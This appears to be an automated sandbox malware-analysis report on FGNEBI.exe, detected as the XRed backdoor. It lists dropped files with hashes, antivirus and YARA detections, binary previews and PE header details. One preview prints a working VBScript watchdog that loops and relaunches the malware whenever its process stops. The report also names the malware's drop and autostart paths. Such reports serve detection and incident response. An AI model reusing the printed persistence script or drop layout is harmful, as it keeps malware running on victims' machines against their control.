                                                                                                                      Size (bytes):771584
                                                                                                                      Entropy (8bit):6.632118854531729
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ITr:ansJ39LyjbJkQFMhmC+6GD98
                                                                                                                      MD5:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                      SHA1:E2F47601FCAD62183937567210B5062B0750FA70
                                                                                                                      SHA-256:5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
                                                                                                                      SHA-512:063E5F2432DE4D24E6BE92BD50B0E12E12DDB030615809994EE64551E8D03391C807FEE2D95EACF7669BA816981FA9ABF3A4A7B8574AE0634BEB670F015A031C
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX5CF5.tmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX5CF5.tmp, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: LWQDFZ.exe, Detection: malicious, Browse
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\FGNEBI.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1691136
                                                                                                                      Entropy (8bit):7.465728800629642
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:gnsJ39LyjbJkQFMhmC+6GD9YhloDX0XOf4tHzneKlVLaqueI0psAzrcP39h:gnsHyjtk2MYC5GDyhloJfaelV6skAfX
                                                                                                                      MD5:1585CB2963DCEB92FBCF6C4C057E191E
                                                                                                                      SHA1:2063F45E9C82553BBC41CB4BC8E10B2D06D701C9
                                                                                                                      SHA-256:67D5FC80B6BF87EB6BC3D505B0102CFDF8E8727D3DA004D982467AB08DED7F0B
                                                                                                                      SHA-512:88475B49D4299519B978711B16E0EA40579A3B671EB898D3D3F8391FBC2DE55665BC0A978A20578A4C83F6BF3894A857E4013F34B0E2E4DB6DE404F66EF9CE47
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0...................@..............................B*......0%...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0%.......&..................@..P....................................@..P........................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\FGNEBI.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26
                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                      Malicious:true
                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2605628298181255
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0LUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                                                      MD5:2D6A37A7630727562B5F884BF1564342
                                                                                                                      SHA1:F1D42F5B5AEB66E22337674CED81614FC89D17B3
                                                                                                                      SHA-256:E8298F06700D18CB6E4EDCFBB6026DE66F53B5B74CDE9450FC92F6EA6E08B0A7
                                                                                                                      SHA-512:50AA4D0BEF047EDA04CE179373F2B83FD4284EC40EE1B0921F45971EF7585E84F626CE458099E7F4BD7DAB7822D11AE9F108F0CCDD5DEAB394DDDE523BB6C878
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7jP43CqhEwbyC5VaLfjtnw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18387
                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                      Malicious:false
                                                                                                                      Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                      Process:C:\Users\user\Desktop\._cache_FGNEBI.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):838
                                                                                                                      Entropy (8bit):5.351462154853889
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:dF/UFrkekHU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFrkek0t+G+7xLxe0WABNVIqZaVzgA
                                                                                                                      MD5:C2A442D55F16F7825FA806CF175998D7
                                                                                                                      SHA1:BE2268C0D36EF9D5C9565241308B22632E2ECE7C
                                                                                                                      SHA-256:93BA79A61734839588641298C6E5CA24B6B36C6E307DFFCAABD56E26088EBE62
                                                                                                                      SHA-512:FFF8EF317D8C8995B0AD5D25DB57EEFC7D8E827CFD6EB51CEAB025721C0439B900B2B817964BA971624727E155D46CF74C7FACE8E4C1332F7A1CF99F13D92B79
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_FGNEBI.exe"..fileset = """C:\Users\user\Desktop\._cache_FGNEBI.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2513646799877
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0wFSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
                                                                                                                      MD5:3D6775739DA5F1DEA8BF536850B39659
                                                                                                                      SHA1:9E179D1CF6EF52E61A59AAA24DD14CC23D078673
                                                                                                                      SHA-256:C29F99DAA6FB1EDCFEB3CB1E2081CE46C2C57F966C8CCF18466E46241075C455
                                                                                                                      SHA-512:C30D66B913541F69E5777B0A46B4508131FF2B0389B0B8915F9903281C3615B56E5E41B54A739652D30CAFD8A2F90DA914FA81C33A642B2A2B78FCE47CD5F4AC
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0tm77pw79VI7dvP8RctlQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):165
                                                                                                                      Entropy (8bit):1.5231029153786204
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:WH25nJFV:WH2/
                                                                                                                      MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                                      SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                                      SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                                      SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                                      Malicious:false
                                                                                                                      Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32768
                                                                                                                      Entropy (8bit):3.746897789531007
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                      MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                      SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                      SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                      SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                      Malicious:false
                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\._cache_FGNEBI.exe
                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:34:21 2024, mtime=Mon Dec 30 09:34:21 2024, atime=Mon Dec 30 09:34:21 2024, length=919552, window=hide
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1808
                                                                                                                      Entropy (8bit):3.4157462588415863
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:8LpsCThFBeMdf1RQAfGF8E2+s9T4IlBIgIIm:8LpbpZ5j1r9MIlLL
                                                                                                                      MD5:27EB47881C85D7319B53B6DEC89E9F3F
                                                                                                                      SHA1:F3697A7195F5AFC5A8D3A18D6C89C01247786D36
                                                                                                                      SHA-256:F13380FCB8928487455036C617A9C6960EAC0361641A3BCBF64456811EC0E606
                                                                                                                      SHA-512:ED120531EDB7F3DF176D6A964D697F8F1DB63529C863B7964F1C86AE54BBA409A9812EB67157660E0C91C22301118A15B612D6F40F5BF7A163C18ED75A122C3C
                                                                                                                      Malicious:false
                                                                                                                      Preview:L..................F.@.. ....Gc.Z..Y.Jc.Z..Y.Jc.Z............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....g.].Z...H.c.Z......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.YHT..........................d...A.p.p.D.a.t.a...B.V.1......YFT..Roaming.@......EW)B.YFT..........................h...R.o.a.m.i.n.g.....V.1......YKT..Windata.@......YKT.YKT....U#.....................S0.W.i.n.d.a.t.a.....`.2......YKT .DELPQB.exe..F......YKT.YKT.....)......................T.D.E.L.P.Q.B...e.x.e.......a...............-.......`............^.n.....C:\Users\user\AppData\Roaming\Windata\DELPQB.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.D.E.L.P.Q.B...e.x.e.*.".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll............................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\._cache_FGNEBI.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):919552
                                                                                                                      Entropy (8bit):7.870873923201665
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:3hloDX0XOf4tHzneKlVLaqueI0psAzrcP39:3hloJfaelV6skAf
                                                                                                                      MD5:66A4951D384B55633AB61ADD85514F07
                                                                                                                      SHA1:BBF7A65A664BB2B8001576BF670A8381AAD3A185
                                                                                                                      SHA-256:6068B17CF1C362BFE7736E0B192C362735A040A68A6D41EB8CCDD8BE242CA191
                                                                                                                      SHA-512:D4DC27627BAA28E79AE6DBD375A08C2AFB5D47F43DD1C15E41A5033AC3C95BAD018EBE5087DAFAD62FE2266FA7B69599EC2BED92DA521208AAB5011F854C7123
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....>rg.........."......P...........0.......@....@.......................................@...@.......@.....................0...$....@..0...................T........................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                      Process:C:\Users\user\Desktop\FGNEBI.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):919552
                                                                                                                      Entropy (8bit):7.870873923201665
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:3hloDX0XOf4tHzneKlVLaqueI0psAzrcP39:3hloJfaelV6skAf
                                                                                                                      MD5:66A4951D384B55633AB61ADD85514F07
                                                                                                                      SHA1:BBF7A65A664BB2B8001576BF670A8381AAD3A185
                                                                                                                      SHA-256:6068B17CF1C362BFE7736E0B192C362735A040A68A6D41EB8CCDD8BE242CA191
                                                                                                                      SHA-512:D4DC27627BAA28E79AE6DBD375A08C2AFB5D47F43DD1C15E41A5033AC3C95BAD018EBE5087DAFAD62FE2266FA7B69599EC2BED92DA521208AAB5011F854C7123
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....>rg.........."......P...........0.......@....@.......................................@...@.......@.....................0...$....@..0...................T........................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18387
                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                      Malicious:false
                                                                                                                      Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):165
                                                                                                                      Entropy (8bit):1.5231029153786204
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:WH25nJFV:WH2/
                                                                                                                      MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                                      SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                                      SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                                      SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                                      Malicious:false
                                                                                                                      Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):771584
                                                                                                                      Entropy (8bit):6.632118854531729
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ITr:ansJ39LyjbJkQFMhmC+6GD98
                                                                                                                      MD5:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                      SHA1:E2F47601FCAD62183937567210B5062B0750FA70
                                                                                                                      SHA-256:5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
                                                                                                                      SHA-512:063E5F2432DE4D24E6BE92BD50B0E12E12DDB030615809994EE64551E8D03391C807FEE2D95EACF7669BA816981FA9ABF3A4A7B8574AE0634BEB670F015A031C
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1835008
                                                                                                                      Entropy (8bit):4.372326918237204
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:VFVfpi6ceLP/9skLmb0hyWWSPtaJG8nAge35OlMMhA2AX4WABlguNciL:TV1PyWWI/glMM6kF7qq
                                                                                                                      MD5:FC930825E4A7982B3106B9C1E8BAE65D
                                                                                                                      SHA1:85577A352D3F4ACECDF9F02BBB8D2918E9B8A6F1
                                                                                                                      SHA-256:53297AC2D66CB6EFF1F8F2E3DD0F846D5BAE87F63F48D2BA2A1D667C083B8447
                                                                                                                      SHA-512:3FD4262F7A9C17D1316760BBB4D838C447BF9A6DD9EF763CE56A86DE28171B218C6AAA86306B7E21237D502ACE5F1B185FE5B4D58FEF0E9C7EF7DA301902DD02
                                                                                                                      Malicious:false
                                                                                                                      Preview:regfE...E....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.T#i.Z...............................................................................................................................................................................................................................................................................................................................................T4]........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.465728800629642
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                      • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                      • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                      • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                      • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                      File name:FGNEBI.exe
                                                                                                                      File size:1'691'136 bytes
                                                                                                                      MD5:1585cb2963dceb92fbcf6c4c057e191e
                                                                                                                      SHA1:2063f45e9c82553bbc41cb4bc8e10b2d06d701c9
                                                                                                                      SHA256:67d5fc80b6bf87eb6bc3d505b0102cfdf8e8727d3da004d982467ab08ded7f0b
                                                                                                                      SHA512:88475b49d4299519b978711b16e0ea40579a3b671eb898d3d3f8391fbc2de55665bc0a978a20578a4c83f6bf3894a857e4013f34b0e2e4db6de404f66ef9ce47
                                                                                                                      SSDEEP:24576:gnsJ39LyjbJkQFMhmC+6GD9YhloDX0XOf4tHzneKlVLaqueI0psAzrcP39h:gnsHyjtk2MYC5GDyhloJfaelV6skAfX
                                                                                                                      TLSH:6D75C02EB2918436E137D6F84F5BB264582BBFF12F25694A3BE43E4C4E3927128151D3
                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                      Icon Hash:0759fdf4f859738f
                                                                                                                      Entrypoint:0x49ab80
                                                                                                                      Entrypoint Section:CODE
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                      DLL Characteristics:
                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      add esp, FFFFFFF0h
                                                                                                                      mov eax, 0049A778h
                                                                                                                      call 00007F06B079DC8Dh
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007F06B07F15D5h
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      mov edx, 0049ABE0h
                                                                                                                      call 00007F06B07F11D4h
                                                                                                                      mov ecx, dword ptr [0049DBDCh]
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      mov edx, dword ptr [00496590h]
                                                                                                                      call 00007F06B07F15C4h
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007F06B07F1638h
                                                                                                                      call 00007F06B079B76Bh
                                                                                                                      add byte ptr [eax], al
                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000xf2530.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
